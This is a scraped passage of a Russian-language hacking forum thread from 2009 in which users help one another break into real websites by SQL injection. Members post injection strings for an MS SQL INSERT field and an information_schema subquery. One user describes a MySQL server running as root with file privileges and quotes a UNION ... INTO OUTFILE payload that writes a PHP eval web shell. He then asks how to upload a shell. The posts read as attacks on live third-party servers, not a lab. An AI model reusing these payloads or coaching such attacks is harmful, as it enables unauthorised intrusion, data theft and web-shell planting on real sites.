ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #9841  
Старый 05.11.2009, 20:17
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

Цитата:
Сообщение от jecka3000  
ctacok,
я поробовал и не только такую комбинаци+еще раз прочел мануал от Кэша..ничего не выходит.
Вот ответ базы на твой запрос:
Здесь INSERT, так что читай ещё мануалы.
 

  #9842  
Старый 05.11.2009, 20:22
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

jecka3000 вставь:
@@version,1,1,1,1,1,1)+--+
__________________
Карфаген должен быть разрушен...
 

  #9843  
Старый 05.11.2009, 20:36
jecka3000
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341

Репутация: 95
По умолчанию

Scipio, не катит
Цитата:
Microsoft OLE DB Provider for SQL Server error '80040e57'

String or binary data would be truncated.

/scripts/UserStatistic.asp, line 26
Ctacok, расскажи поподробнее, что означает insert и что прочесть?
 

  #9844  
Старый 05.11.2009, 20:43
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

давай ссылку тогда, просто @@version надо подставить в нестроковое поле
__________________
Карфаген должен быть разрушен...
 

  #9845  
Старый 05.11.2009, 20:53
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

1',@@version,1,1,1,1)+--+
__________________
Карфаген должен быть разрушен...
 

  #9846  
Старый 05.11.2009, 21:16
jecka3000
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341

Репутация: 95
По умолчанию

Scipio,кстати, а чтож тогда делать с information_schema?
1',=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES)+--+ ?
 

  #9847  
Старый 05.11.2009, 21:31
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

хехе, не получится использовать подзапросы здесь
__________________
Карфаген должен быть разрушен...
 

  #9848  
Старый 05.11.2009, 22:34
jecka3000
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341

Репутация: 95
По умолчанию

Scipio, ну посоветуй что нибудь, я вообще в такой ситуации первый раз, может быть мануал какой нить есть)
 

  #9849  
Старый 06.11.2009, 05:07
hackmen
Участник форума
Регистрация: 22.10.2007
Сообщений: 119
Провел на форуме:
598447

Репутация: 123
По умолчанию

Всем привет.
Есть сервак со след параметрами

base:articles
ver:5.1.36-community
user:root@localhost
basedir:C:\Program Files\MySQL\MySQL Server 5.1\
datadir:C:\Documents and Settings\All Users\Application Data\MySQL\MySQL Server 5.1\Data\
os:Win32
mysql.password:****
mysql.user:****
tmpdir:C:\WINDOWS\TEMP
file_priv:Y

Собственно интересна возможность заливки шелла.
Если есть статьи какие нибудь про load_file- накидайте ссылок (я ничего толкового не нашел). И еще интересует возможность использования
mysql.password:****
mysql.user:****
Где и как можно узнать хост на котором БД.

Сорри, если что-то не так понял и неправильно написал.


Зы
Цитата:
-1' UNION SELECT 1,2,3,'<?php eval($_GET[‘e’]) ?>',5,6 INTO OUTFILE '1.php'; --
Остается только найти полный путь к корню сайта на сервере и дописать его перед 1.php.
Я так понимаю это вот этот путь C:\Documents and Settings\All Users\Application Data\MySQL\MySQL Server 5.1\Data\
?

Заранее спасибо. С меня +++ за помощь.
 

  #9850  
Старый 06.11.2009, 05:16
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763

Репутация: 1680


Отправить сообщение для Nightmarе с помощью ICQ
По умолчанию

Цитата:
Сообщение от hackmen  
Где и как можно узнать хост на котором БД.
Цитата:
Сообщение от hackmen  
user:root@localhost
 
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ